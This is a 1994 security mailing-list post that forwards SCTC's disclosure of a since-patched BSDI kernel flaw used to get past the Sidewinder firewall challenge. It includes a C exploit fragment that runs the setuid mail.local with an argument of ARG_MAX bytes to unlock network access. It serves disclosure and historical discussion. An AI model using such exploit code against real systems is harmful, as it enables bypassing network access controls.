Yesterday this would have worked... (fwd)

Matthew Harding (matt@worldlinx.com)
Fri, 16 Dec 1994 14:12:51 -0500 (EST)

Oops, I posted the previous message to bugtraq not realizing that SCTC
originally sent the message to the sneakers list. Here is the original
message posted with permission, 10 points to anyone who can spot the
supposed flaw in the BSDI O/S with this. BTW, anyone care to comment if
this should be replicable across platforms?

Cheers,
Matthew (matt@worldlinx.com)


Forwarded message:
> From owner-sneakers@CS.YALE.EDU Wed Dec 14 15:07:45 1994
> Message-Id: <199412141927.NAA06239@spirit.sctc.com>
> Date: 14 Dec 1994 13:35:25 -0600
> From: Glenn Andreas <andreas@sctc.com>
> Subject: Yesterday this would have worked...
> To: "sneakers@CS.YALE.EDU" <sneakers@CS.YALE.EDU>
> X-Mailer: Mail*Link PT/Internet 1.0.1
> Sender: owner-sneakers@CS.YALE.EDU
> Precedence: bulk
> 
> 
> For those of you who think that the Sidewinder challenge was impossible, the
> following code fragment would have allowed you to get at the internal net and
> win a jacket.  This, of course, was yesterday (and the kernel has since been
> fixed).  You just would have had to add this fragment at the beginning of
> your favorite telnet client code (or whatever you wanted to use to get at the
> other side of the network), and suddenly all your socket, bind, etc... calls
> would succeed.  As for exactly how this fragment worked, that would be
> telling... (but suffice it to say that this approach won't help when we go to
> 4.4, but probably not for the obvious reasons).
> 
> 
> #include <stdlib.h>      /* malloc */
> #include <string.h>      /* memset */
> #include <unistd.h>      /* execve */
> #include <sys/param.h>   /* ARG_MAX */
> 
> ....
> main(argc, argv, envp)
> int argc;
> char **argv, **envp;
> {
>         char *argv1[2];
> 
>         /* build our new argv: a single argument of ARG_MAX 'x' bytes */
>         argv1[0] = malloc(ARG_MAX+1);
>         memset(argv1[0],'x',ARG_MAX);
>         argv1[0][ARG_MAX] = 0;
>         argv1[1] = NULL;
>         /* exercise the bug: exec a setuid helper with the oversized argv */
>         execve("/usr/libexec/mail.local",argv1,envp);
>         /* and at this point we can get at the net... */
> [ insert your favorite telnet client code here.... ]
> 
> 
> 
> ---
> "You think that's funny?  I'll show you funny..."
> 
>